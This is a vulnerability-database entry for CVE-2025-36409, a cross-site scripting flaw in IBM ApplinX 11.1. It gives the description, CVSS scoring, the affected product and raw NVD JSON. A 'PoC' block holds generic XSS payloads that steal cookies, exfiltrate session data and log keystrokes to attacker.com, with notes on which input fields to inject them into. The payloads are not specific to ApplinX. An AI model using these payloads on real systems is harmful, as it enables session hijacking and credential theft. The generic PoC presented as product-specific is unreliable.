Security Vulnerability Report
中文
CVE-2025-36409 CVSS 5.4 MEDIUM

CVE-2025-36409

Published: 2026-01-20 16:16:04
Last Modified: 2026-01-26 19:46:46

Description

IBM ApplinX 11.1 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:applinx:11.1.0:*:*:*:*:*:*:* - VULNERABLE
IBM ApplinX 11.1 (所有子版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-36409 XSS PoC for IBM ApplinX 11.1 --> <!-- This PoC demonstrates the cross-site scripting vulnerability --> <!-- Method 1: Basic XSS Test --> <script>alert('XSS - CVE-2025-36409')</script> <!-- Method 2: Cookie Stealing PoC --> <script> var cookie = document.cookie; var img = new Image(); img.src = 'https://attacker.com/steal?cookie=' + encodeURIComponent(cookie); </script> <!-- Method 3: Session Hijacking --> <script> fetch('https://attacker.com/log?data=' + btoa(document.cookie)); </script> <!-- Method 4: Keylogger --> <script> document.addEventListener('keypress', function(e) { fetch('https://attacker.com/klog?key=' + e.key); }); </script> <!-- Usage: Inject any of the above payloads into input fields in IBM ApplinX Web UI --> <!-- Example: User profile fields, search boxes, or any text input areas -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-36409", "sourceIdentifier": "[email protected]", "published": "2026-01-20T16:16:04.343", "lastModified": "2026-01-26T19:46:45.563", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM ApplinX 11.1 is vulnerable to cross-site scripting. This vulnerability allows an authenticated user to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session."}, {"lang": "es", "value": "IBM ApplinX 11.1 es vulnerable a cross-site scripting. Esta vulnerabilidad permite a un usuario autenticado incrustar código JavaScript arbitrario en la interfaz de usuario web, alterando así la funcionalidad prevista y lo que podría llevar a la divulgación de credenciales dentro de una sesión de confianza."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.3, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:applinx:11.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "7116F100-D485-4B66-A910-9A4663360A0F"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7257446", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}